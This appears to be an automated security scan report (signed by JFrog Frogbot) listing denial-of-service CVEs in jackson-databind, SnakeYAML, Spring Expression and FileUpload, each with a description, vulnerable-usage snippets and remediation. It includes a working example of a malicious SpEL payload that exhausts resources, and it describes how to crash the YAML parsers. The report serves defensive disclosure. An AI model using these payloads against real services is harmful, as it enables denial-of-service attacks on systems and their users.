It was discovered that FileUpload does not have a limit on the number of files per request when processing multi-part uploads, which could lead to a denial of service.

It should be noted that upgrading to the fixed version is not sufficient to resolve the issue.
To fully resolve this, the setFileCountMax() function must be called explicitly, as it's disabled by default on the "fixed" version (1.5).

[ CVE-2022-42003 ] com.fasterxml.jackson.core:jackson-databind 2.12.6.1

Description:
Jackson-databind (previously known as "jackson-mapper-asl") is a streaming API library for Java. One of its components, ObjectMapper is responsible for serialization and deserialization of Java objects.
It was discovered that when the UNWRAP_SINGLE_VALUE_ARRAYS deserialization option is enabled (non-default), the deserialization of a deeply nested array could cause a stack exhaustion and subsequently crash the process.
This issue can be exploited when trying to deserialize untrusted data, for example -

ObjectMapper mapper = new ObjectMapper();
mapper.enable(JsonParser.Feature.UNWRAP_SINGLE_VALUE_ARRAYS);
mapper.readTree(untrusted_data); 

The issue is likely to be exploited in vulnerable configurations since a public exploit exists.

Remediation:

Development mitigations

If possible, do not include the UNWRAP_SINGLE_VALUE_ARRAYS deserialization feature.
Specifically, remove this line from the code of the vulnerable application -
mapper.enable(JsonParser.Feature.UNWRAP_SINGLE_VALUE_ARRAYS);

[ CVE-2022-42004 ] com.fasterxml.jackson.core:jackson-databind 2.12.6.1

Description:
Jackson-databind (previously known as "jackson-mapper-asl") is a streaming API library for Java. One of its components, ObjectMapper is responsible for serialization and deserialization of Java objects.
It was discovered that when the UNWRAP_SINGLE_VALUE_ARRAYS deserialization option is enabled (non-default), the deserialization of a deeply nested array via the BeanDeserializer class could cause a stack exhaustion and subsequently crash the process.
This issue can be exploited when trying to deserialize untrusted data, for example -

ObjectMapper mapper = new ObjectMapper();
mapper.enable(JsonParser.Feature.UNWRAP_SINGLE_VALUE_ARRAYS);
mapper.readTree(untrusted_data); 

The issue is likely to be exploited in vulnerable configurations since a public exploit exists.

Remediation:

Development mitigations

If possible, do not include the UNWRAP_SINGLE_VALUE_ARRAYS deserialization feature.
Specifically, remove this line from the code of the vulnerable application -
mapper.enable(JsonParser.Feature.UNWRAP_SINGLE_VALUE_ARRAYS);

[ CVE-2022-25857 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

It was discovered that a crafted YAML file containing many nested keys can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A PoC was published here

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

[ CVE-2023-20861 ] org.springframework:spring-expression 5.3.20

Description:
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition.

[ CVE-2023-35116 ] com.fasterxml.jackson.core:jackson-databind 2.12.6.1

Description:
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker.

[ CVE-2023-20863 ] org.springframework:spring-expression 5.3.20

Description:
The Spring Framework is a widely used Java-based application framework that provides infrastructure support for the development of enterprise-level Java applications.
One of Spring's features is the Spring Expression Language (SpEL) which is an expression language that supports querying and manipulating an object graph at runtime. It offers many advanced features like method invocation and basic string templating functionality.

The most common usage of SpEL is to provide an expression string that is evaluated against a specific object instance (called the root object). SpEL also supports array creation in its query.

It was discovered that long SpEL expressions may cause the SpEL engine to consume an exponential amount of resources, which leads to a denial-of-service.
Both the StandardEvaluationContext and SimpleEvaluationContext context methods are affected.

To exploit this issue, an attacker must be able to provide a crafted SpEL expression that will be evaluated in the target web application (for example, through the SpelExpressionParser.ParseExpression API call)

Example of a malicious SpEL query that exploits this issue:

SpelExpressionParser parser = new SpelExpressionParser();
String payload = "'X' + '%s'".formatted(" ".repeat(9992));
Expression expr = parser.parseExpression(payload);
SimpleEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
expr.getValue(context);

[ CVE-2022-41854 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

When loading a YAML document, SnakeYAML uses recursion to parse objects from the document.

It was discovered that a crafted YAML file containing a deeply nested YAML can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A PoC was published here

Despite the vulnerability being fixed and patched on SnakeYAML v1.32 or later, a non-default configuration (setAllowRecursiveKeys(true);) allows this issue to still be exploitable.
However, such a configuration is very rare.

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

[ CVE-2022-38749 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

It was discovered that a crafted YAML file containing a deeply nested expression can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A crashing PoC was published here

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

[ CVE-2022-38750 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

When loading a YAML document, SnakeYAML uses recursion to parse objects from the document.

It was discovered that a crafted YAML file containing a deeply nested YAML can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A PoC was published here

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

[ CVE-2022-38751 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

It was discovered that a crafted YAML file containing an extremely long regular expression can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A PoC was published [here](PoC demonstrates denial of service)

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

[ CVE-2022-38752 ] org.yaml:snakeyaml 1.28

Description:
SnakeYAML is a popular Java-based YAML parsing that provides a high-level API for serialization and deserialization of YAML documents.

It was discovered that a crafted YAML file containing a short regular expression can lead to denial of service due to stack exhaustion.
To exploit this issue, an attacker must find remote input that propagates into the Yaml.load() method. Note that the issue can be exploited even if the Yaml class is initialized with a SafeConstructor:

Yaml yaml = new Yaml(new SafeConstructor());
yaml.load(external_data);

A PoC was published here

Remediation:

Development mitigations

Wrap SnakeYAML's load method with exception handling -

try {
	String parsed = yaml.load(strYaml);
}
catch(StackOverflowError e) {
	System.err.println("ERROR: Stack limit reached");
}

---

🐸 JFrog Frogbot